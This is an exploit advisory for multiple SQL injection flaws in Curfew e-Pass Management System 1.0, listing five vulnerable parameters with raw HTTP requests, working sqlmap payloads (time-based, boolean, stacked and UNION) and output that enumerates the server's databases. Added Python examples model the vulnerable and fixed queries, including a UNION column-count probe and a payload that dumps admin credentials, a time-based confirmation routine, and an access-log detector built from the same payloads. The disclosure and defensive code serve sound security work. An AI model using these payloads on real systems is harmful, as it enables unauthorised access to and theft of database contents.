Curfew e-Pass Management System 1.0 SQL Injection
Posted Aug 6, 2020
Authored by Mucahit Karadag

Curfew e-Pass Management System version 1.0 suffers from multiple remote SQL injection vulnerabilities. Original discovery of SQL injection in this version is attributed to gh1mau.

tags | exploit, remote, vulnerability, sql injection
SHA-256 | 02ec0bb1649cf997b05a017aed698bf8edd9fdefbef3abbf9e50334a94facc84

# Exploit Title: Curfew e-Pass Management System 1.0 Multiple SQL Injection Vulnerabilities
# Google Dork: N/A
# Date: 04.08.2020
# Exploit Author: Mucahit Karadag
# Vendor Homepage: https://products.phpgurukul.com/product/curfew-e-pass-management-system-project-report/
# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=11661
# Version: 1.0
# Tested on: Ubuntu Server 14.04.6 LTS
# CVE : N/A

###
# Software Description:
# Curfew Pass Management System is a web-based application that manages the
# records of curfew passes issued by the administration. It is an automated
# system that processes pass data quickly and in a systematic manner.
#
# Vulnerability Description:
# The Curfew e-Pass Management System 1.0 web application is vulnerable to
# five distinct SQL injection vulnerabilities across multiple endpoints.
# Each vulnerability is listed in detail below.
#
# In summary, the vulnerabilities are:
# Unauthenticated SQL Injection Identified on searchdata Parameter
# Authenticated SQL Injection Identified on editid Parameter
# Authenticated SQL Injection Identified on fromdate Parameter
# Authenticated SQL Injection Identified on searchdata Parameter
# Authenticated SQL Injection Identified on viewid Parameter
###

##
## [Unauthenticated SQL Injection Identified on searchdata Parameter]
##

POST /cpms/index.php HTTP/1.1
Host: 12.0.0.163
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
Origin: http://12.0.0.163
DNT: 1
Connection: close
Referer: http://12.0.0.163/cpms/index.php
Cookie: PHPSESSID=pskcl31tjpg4gsddvl4htrvsd4
Upgrade-Insecure-Requests: 1

searchdata=&search=

The "searchdata" parameter of the search feature on the main page (HTTP POST to /cpms/index.php) is vulnerable to SQL injection. No authentication is required, so any remote user who can reach the application can exploit it.

---
Parameter: searchdata (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: searchdata=asd' AND (SELECT 1646 FROM (SELECT(SLEEP(5)))qasT) AND 'hZfX'='hZfX&search=

Type: UNION query
Title: Generic UNION query (NULL) - 11 columns
Payload: searchdata=asd' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171627071,0x624a58537255484d436f537963554473417772544758624364725249617a63534a564271704b756d,0x71766a6271),NULL,NULL,NULL,NULL-- -&search=
---
[09:52:09] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.0.12
[09:52:10] [INFO] fetching database names
available databases [5]:
[*] cpms
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
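
The sqlmap output above shows the two injection shapes that recur through this advisory: a string context (searchdata, fromdate), where the payload closes a quote and is confirmed with a NULL-padded UNION of the right column count, and a numeric context (editid, viewid), where a bare `AND 4435=4435` is enough. The following is an added example, not code from the advisory or from the application, that models both shapes against an in-memory SQLite database so it runs offline. The table and column names (tblpass, tbladmin) and the query texts are assumptions, since the application's source is not shown here. It puts each vulnerable query beside the parameterised form that fixes it and includes the column-count probe behind sqlmap's "Generic UNION query (NULL) - N columns" line.

```python
"""
Added example, not from the advisory or the application: the two injection
shapes reported above, modelled on SQLite so it runs offline.  Schema, table
names and query texts are assumptions.
"""
import sqlite3
from typing import Callable, List, Optional, Tuple


def build_db() -> sqlite3.Connection:
    """In-memory database with constructed rows; the real schema is not on the page."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tblpass (id INTEGER, full_name TEXT, pass_reason TEXT)")
    conn.execute("CREATE TABLE tbladmin (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO tblpass VALUES (?, ?, ?)",
                     [(1, "Alice Example", "medical"), (2, "Bob Example", "work")])
    conn.execute("INSERT INTO tbladmin VALUES (1, 'admin', 'constructed-hash-value')")
    conn.commit()
    return conn


# --- string context: searchdata / fromdate -----------------------------------

def search_pass_vulnerable(conn: sqlite3.Connection, searchdata: str) -> List[Tuple]:
    """Input is spliced into a quoted LIKE pattern; a single quote breaks out of it."""
    sql = ("SELECT id, full_name, pass_reason FROM tblpass "
           f"WHERE full_name LIKE '%{searchdata}%'")
    return conn.execute(sql).fetchall()


def search_pass_fixed(conn: sqlite3.Connection, searchdata: str) -> List[Tuple]:
    """Same query with a bound parameter; the wildcards are added in code, not in SQL."""
    sql = "SELECT id, full_name, pass_reason FROM tblpass WHERE full_name LIKE ?"
    return conn.execute(sql, ("%" + searchdata + "%",)).fetchall()


# --- numeric context: editid / viewid ----------------------------------------

def view_pass_vulnerable(conn: sqlite3.Connection, viewid: str) -> List[Tuple]:
    """No quotes around the id, so 'viewid=3 AND 2054=2054' lands straight in the WHERE."""
    return conn.execute(f"SELECT id, full_name FROM tblpass WHERE id={viewid}").fetchall()


def view_pass_fixed(conn: sqlite3.Connection, viewid: str) -> List[Tuple]:
    """Reject anything that is not an integer before binding it."""
    if not viewid.isdigit():
        raise ValueError("viewid must be a non-negative integer")
    return conn.execute("SELECT id, full_name FROM tblpass WHERE id=?", (int(viewid),)).fetchall()


def find_union_column_count(conn: sqlite3.Connection,
                            query_fn: Callable[[sqlite3.Connection, str], List[Tuple]],
                            max_cols: int = 16) -> Optional[int]:
    """
    The probe behind sqlmap's 'Generic UNION query (NULL) - N columns': grow a
    NULL-only SELECT until the database accepts it AND the all-NULL row shows up
    in the result, which proves the injected SELECT really ran.  A parameterised
    query never errors and never returns that row, so the probe yields None.
    """
    for n in range(1, max_cols + 1):
        nulls = ",".join(["NULL"] * n)
        try:
            rows = query_fn(conn, f"zzz' UNION ALL SELECT {nulls}-- -")
        except sqlite3.Error:
            continue  # column-count mismatch (or the quote never closed)
        if any(all(v is None for v in row) for row in rows):
            return n
    return None


if __name__ == "__main__":
    db = build_db()
    print("vulnerable search: UNION column count =", find_union_column_count(db, search_pass_vulnerable))
    dump = "zzz' UNION ALL SELECT NULL, username, password FROM tbladmin-- -"
    print("vulnerable search:", search_pass_vulnerable(db, dump))
    print("fixed search:     ", search_pass_fixed(db, dump))
    print("vulnerable view 1 AND 1=2:", view_pass_vulnerable(db, "1 AND 1=2"))
    print("fixed search probe:", find_union_column_count(db, search_pass_fixed))
```

The fix is the same in PHP: bind the value with `mysqli_stmt_bind_param` or a PDO prepared statement, and cast identifiers such as editid and viewid to int before they reach the query.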

##
## [Authenticated SQL Injection Identified on editid Parameter]
##

GET /cpms/admin/edit-category-detail.php?editid=1 HTTP/1.1
Host: 12.0.0.163
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Referer: http://12.0.0.163/cpms/admin/manage-category.php
Cookie: PHPSESSID=pskcl31tjpg4gsddvl4htrvsd4
Upgrade-Insecure-Requests: 1

The "editid" parameter is vulnerable to SQL injection on the HTTP GET request to the /admin/edit-category-detail.php endpoint. An authenticated admin session is required.

---
Parameter: editid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: editid=1 AND 4435=4435

Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: editid=1;SELECT SLEEP(5)#

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: editid=1 AND (SELECT 2111 FROM (SELECT(SLEEP(5)))TtYi)

Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: editid=1 UNION ALL SELECT NULL,CONCAT(0x7176707871,0x5a4e55767242794d476c47766f765a4a62704b54775074624e684745515a59626662504d46726f4a,0x716a6b7071),NULL-- -
---
[09:54:59] [INFO] testing MySQL
[09:54:59] [INFO] confirming MySQL
[09:54:59] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.0.0
[09:54:59] [INFO] fetching database names
available databases [5]:
[*] cpms
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin

##
## [Authenticated SQL Injection Identified on fromdate Parameter]
##

POST /cpms/admin/pass-bwdates-reports-details.php HTTP/1.1
Host: 12.0.0.163
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 45
Origin: http://12.0.0.163
DNT: 1
Connection: close
Referer: http://12.0.0.163/cpms/admin/pass-bwdates-report.php
Cookie: PHPSESSID=pskcl31tjpg4gsddvl4htrvsd4
Upgrade-Insecure-Requests: 1

fromdate=2020-08-04&todate=2020-08-26&submit=

The "fromdate" parameter is vulnerable to SQL injection on the HTTP POST request to the /admin/pass-bwdates-reports-details.php endpoint. An authenticated admin session is required.
---
Parameter: fromdate (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: fromdate=2020-08-02' AND (SELECT 6843 FROM (SELECT(SLEEP(5)))eIgq) AND 'Vnjn'='Vnjn&todate=2020-08-27&submit=
---
[09:58:36] [INFO] testing MySQL
[09:58:36] [INFO] confirming MySQL
[09:58:36] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.0.0
[09:58:36] [INFO] fetching database names
[09:58:36] [INFO] fetching number of databases
[09:58:36] [INFO] resumed: 5
[09:58:36] [INFO] resuming partial value: informat
[09:58:36] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]

[09:58:46] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[09:58:56] [INFO] adjusting time delay to 1 second due to good response times
[09:59:37] [INFO] retrieved: cpms
[09:59:37] [INFO] retrieved: information_schema
[10:00:56] [INFO] retrieved: mysql
[10:02:25] [INFO] retrieved: performance_schema
[10:03:41] [INFO] retrieved: phpmyadmin
available databases [5]:
[*] cpms
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
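
The fromdate finding above rests entirely on time-based blind evidence, and sqlmap's own messages in that output (the larger statistical model, the warning about network stress, the delay adjusted to one second) show why such evidence needs care before it is trusted. The following is an added example, not part of the advisory or of sqlmap, of how to confirm a time-based injection point with interleaved baseline, control and delayed requests instead of a single slow response. The transport is a constructed in-process stand-in for the HTTP request so that it runs offline; the SLEEP payload shape is the one sqlmap reported for fromdate above, and the 80% threshold is an assumption for a quiet network.

```python
"""
Added example: confirm a time-based blind SQL injection point without
trusting a single slow response.  The 'send' callable stands in for the HTTP
request (in practice: requests.post(url, data={"fromdate": payload, ...}));
here it is a constructed simulator so the example runs offline.
"""
import re
import statistics
import time
from typing import Callable, Dict, List, Tuple

# Payload shape sqlmap reported for the fromdate parameter, with the delay
# left as a placeholder.  Fractional seconds are accepted by MySQL SLEEP().
SLEEP_PAYLOAD = "2020-08-02' AND (SELECT 6843 FROM (SELECT(SLEEP({d})))eIgq) AND 'Vnjn'='Vnjn"
BENIGN_VALUE = "2020-08-02"


def _timed(send: Callable[[str], None], value: str) -> float:
    start = time.perf_counter()
    send(value)
    return time.perf_counter() - start


def confirm_time_based(send: Callable[[str], None], delay: float = 5.0,
                       trials: int = 3, margin: float = 0.8) -> Tuple[bool, Dict[str, List[float]]]:
    """
    Interleave three kinds of requests so that server load drifting during
    the test cannot masquerade as an injected delay:
      baseline - the benign value
      control  - the injected shape with SLEEP(0), proving the shape itself is not slow
      delayed  - the injected shape with SLEEP(delay)
    The point is confirmed only if every delayed sample exceeds the median of
    the baseline and control samples by at least margin * delay.  The margin
    (80% of the requested delay) is an assumption tuned for a quiet network.
    """
    timings: Dict[str, List[float]] = {"baseline": [], "control": [], "delayed": []}
    for _ in range(trials):
        timings["baseline"].append(_timed(send, BENIGN_VALUE))
        timings["control"].append(_timed(send, SLEEP_PAYLOAD.format(d=0)))
        timings["delayed"].append(_timed(send, SLEEP_PAYLOAD.format(d=delay)))
    quiet = statistics.median(timings["baseline"] + timings["control"])
    threshold = quiet + margin * delay
    confirmed = all(t >= threshold for t in timings["delayed"])
    return confirmed, timings


def make_target(vulnerable: bool, base_latency: float = 0.002) -> Callable[[str], None]:
    """
    Constructed stand-in for the application.  A vulnerable target honours
    SLEEP(n) found in the input exactly as an unparameterised MySQL query
    would; a fixed target treats the whole value as data and ignores it.
    """
    sleep_re = re.compile(r"SLEEP\((\d+(?:\.\d+)?)\)")

    def send(value: str) -> None:
        time.sleep(base_latency)
        m = sleep_re.search(value)
        if vulnerable and m:
            time.sleep(float(m.group(1)))
    return send


if __name__ == "__main__":
    for label, target in (("vulnerable", make_target(True)), ("fixed", make_target(False))):
        ok, t = confirm_time_based(target, delay=0.1)
        print(f"{label:10s} confirmed={ok} delayed={[round(x, 3) for x in t['delayed']]}")
```

Against a real target keep the delay well above the observed jitter (sqlmap's default of five seconds is a reasonable floor on a LAN) and run the probe serially, as the network-stress warning in the output above advises; a saturated link makes every request slow and the control samples are what catch that.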

##
## [Authenticated SQL Injection Identified on searchdata Parameter]
##

POST /cpms/admin/search-pass.php HTTP/1.1
Host: 12.0.0.163
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
Origin: http://12.0.0.163
DNT: 1
Connection: close
Referer: http://12.0.0.163/cpms/admin/search-pass.php
Cookie: PHPSESSID=pskcl31tjpg4gsddvl4htrvsd4
Upgrade-Insecure-Requests: 1

searchdata=asd&search=

The "searchdata" parameter is vulnerable to SQL injection on the HTTP POST request to the /admin/search-pass.php endpoint. An authenticated admin session is required; this is a second, separate instance of the searchdata injection, distinct from the unauthenticated one on /cpms/index.php.
---
Parameter: searchdata (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: searchdata=123123123' AND (SELECT 8177 FROM (SELECT(SLEEP(5)))Hojp) AND 'vmxB'='vmxB&search=

Type: UNION query
Title: Generic UNION query (NULL) - 11 columns
Payload: searchdata=123123123' UNION ALL SELECT NULL,NULL,CONCAT(0x7162786a71,0x7174545a63634a4b774a7561487a75456a4b4f55554b6e57704f6342514a744e4643534d43724c56,0x717a6a7871),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&search=
---
[10:10:57] [INFO] testing MySQL
[10:10:57] [WARNING] reflective value(s) found and filtering out
[10:10:57] [INFO] confirming MySQL
[10:10:58] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.0.0
[10:10:58] [INFO] fetching database names
available databases [5]:
[*] cpms
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin


##
## [Authenticated SQL Injection Identified on viewid Parameter]
##

GET /cpms/admin/view-pass-detail.php?viewid=3 HTTP/1.1
Host: 12.0.0.163
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: PHPSESSID=pskcl31tjpg4gsddvl4htrvsd4
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

The "viewid" parameter is vulnerable to SQL injection on the HTTP GET request to the /admin/view-pass-detail.php endpoint. An authenticated admin session is required.
---
Parameter: viewid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: viewid=3 AND 2054=2054

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: viewid=3 AND (SELECT 1904 FROM (SELECT(SLEEP(5)))VWYW)

Type: UNION query
Title: Generic UNION query (NULL) - 11 columns
Payload: viewid=3 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171787871,0x6c566b51504651727a68446f5077707646555a444466646c427470556b514e704179774e6b787661,0x71766a7871),NULL-- -
---
[10:12:27] [INFO] testing MySQL
[10:12:27] [INFO] confirming MySQL
[10:12:28] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.0.0
[10:12:28] [INFO] fetching database names
available databases [5]:
[*] cpms
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
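
For a defender, the payloads reported across the five findings above also define what an exploitation attempt looks like in the web server's own logs. The following added example, not part of the advisory, scans Apache combined-format access log lines for the GET-based shapes (editid and viewid travel in the query string) and reports which signature each decoded parameter value matched. The log lines are constructed samples, not captured traffic, and the client IPs in them are made up. Note the limitation: the searchdata and fromdate payloads are POST bodies and never appear in a standard access log, so this check has to be paired with request-body logging or a WAF to cover those two endpoints.

```python
"""
Added example (not part of the advisory): flag the GET-based injection
attempts from this advisory in Apache combined-format access logs.  Only
editid and viewid travel in the query string; the searchdata and fromdate
payloads are POST bodies and never appear in a standard access log.
The log lines below are constructed samples, not captured traffic.
"""
import re
from typing import Dict, List
from urllib.parse import parse_qsl, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)'
)

# Signatures for the payload shapes sqlmap reported above (UNION/NULL, SLEEP,
# stacked query, boolean tautology).  Each runs on the URL-decoded value.
RULES = [
    ("union-select", re.compile(r"\bUNION\b.*\bSELECT\b", re.I | re.S)),
    ("sleep", re.compile(r"\bSLEEP\s*\(", re.I)),
    ("stacked", re.compile(r";\s*(?:SELECT|INSERT|UPDATE|DELETE)\b", re.I)),
    ("boolean", re.compile(r"\bAND\s+\d+\s*=\s*\d+", re.I)),
]

# Constructed sample log: one benign and three injected editid/viewid requests,
# plus a POST whose body (searchdata) is invisible here by design.
SAMPLE_LOG = """\
10.0.0.5 - - [04/Aug/2020:09:54:59 +0000] "GET /cpms/admin/edit-category-detail.php?editid=1 HTTP/1.1" 200 5123
10.0.0.5 - - [04/Aug/2020:09:55:01 +0000] "GET /cpms/admin/edit-category-detail.php?editid=1%20AND%204435%3D4435 HTTP/1.1" 200 5123
10.0.0.5 - - [04/Aug/2020:09:55:02 +0000] "GET /cpms/admin/edit-category-detail.php?editid=1%3BSELECT%20SLEEP%285%29%23 HTTP/1.1" 200 5123
10.0.0.5 - - [04/Aug/2020:10:12:28 +0000] "GET /cpms/admin/view-pass-detail.php?viewid=3%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL--%20- HTTP/1.1" 200 6011
10.0.0.7 - - [04/Aug/2020:10:13:00 +0000] "GET /cpms/admin/view-pass-detail.php?viewid=4 HTTP/1.1" 200 6011
10.0.0.7 - - [04/Aug/2020:10:13:05 +0000] "POST /cpms/admin/search-pass.php HTTP/1.1" 200 4000
"""


def classify_value(value: str) -> List[str]:
    """Return the names of every rule that matches one decoded parameter value."""
    return [name for name, rx in RULES if rx.search(value)]


def scan_access_log(lines) -> List[Dict[str, object]]:
    """Parse each line, decode the query string and report parameters that match a rule."""
    hits: List[Dict[str, object]] = []
    for raw in lines:
        m = LOG_RE.match(raw.rstrip("\n"))
        if not m:
            continue  # malformed or non-combined-format line; skip rather than guess
        parts = urlsplit(m.group("target"))
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            rules = classify_value(value)
            if rules:
                hits.append({"ip": m.group("ip"), "path": parts.path,
                             "param": name, "value": value, "rules": rules})
    return hits


if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG.splitlines()):
        print(f"{hit['ip']} {hit['path']} {hit['param']}={hit['value']!r} -> {hit['rules']}")
```

The boolean rule deliberately requires a numeric tautology (`AND 4435=4435`) rather than the bare word AND, so ordinary search text does not trip it; the UNION rule will also match a legitimate query containing both words, which is acceptable for a low-volume admin endpoint but worth tuning elsewhere.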